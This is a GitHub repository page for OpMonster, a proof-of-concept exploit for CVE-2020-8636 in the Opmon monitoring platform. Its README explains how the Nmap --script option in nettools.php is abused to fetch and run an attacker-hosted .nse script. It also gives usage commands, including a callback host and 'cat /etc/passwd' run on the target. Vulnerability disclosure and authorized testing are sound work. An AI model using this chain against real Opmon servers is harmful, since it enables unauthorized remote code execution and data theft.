Skip to content

phor3nsic/opmonster

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

18 Commits
 
 
 
 
 
 
 
 

Repository files navigation

OpMonster

CVE-2020-8636 — authenticated remote code execution exploit for Opmon

AboutInstallUsageLicense

language last commit license stars

OpMonster

About

OpMonster is a proof-of-concept exploit for CVE-2020-8636, a remote code execution vulnerability in the Opmon monitoring platform. It abuses the nettools.php endpoint, which lets you run Nmap with arbitrary --script options. The exploit makes Opmon fetch a malicious .nse Nmap script from a server you control (via http-fetch), drops it in /tmp, then runs it to execute your command on the target and prints the output.

Discovered and developed by @phor3nsic. More details: Three CVEs on Opmon.

Install

git clone https://github.com/phor3nsic/opmonster
cd opmonster
pip install requests

Usage

First, start a web server on a host the target can reach, in a directory where the generated .nse script can be downloaded from (the exploit writes the script into the current directory):

php -S 0.0.0.0:1337

Then run the exploit with four positional arguments:

python3 opmonster.py https://vulnhost.com myhost.ngrok.io 80 "cat /etc/passwd"
Argument Description
HOST Target Opmon base URL (e.g. https://vulnhost.com)
LHOST Your server host that serves the .nse script
LPORT Your server port
CMD Command to execute on the target

The exploit aborts with a message if the target does not download the script ("not vulnerable") or cannot make an outbound connection to your server.

Disclaimer

For authorized security testing and education only. You are responsible for how you use it.

License

MIT © phor3nsic

About

CVE-2020-8636 authenticated remote code execution exploit for Opmon

Topics

Resources

License

Stars

2 stars

Watchers

2 watching

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages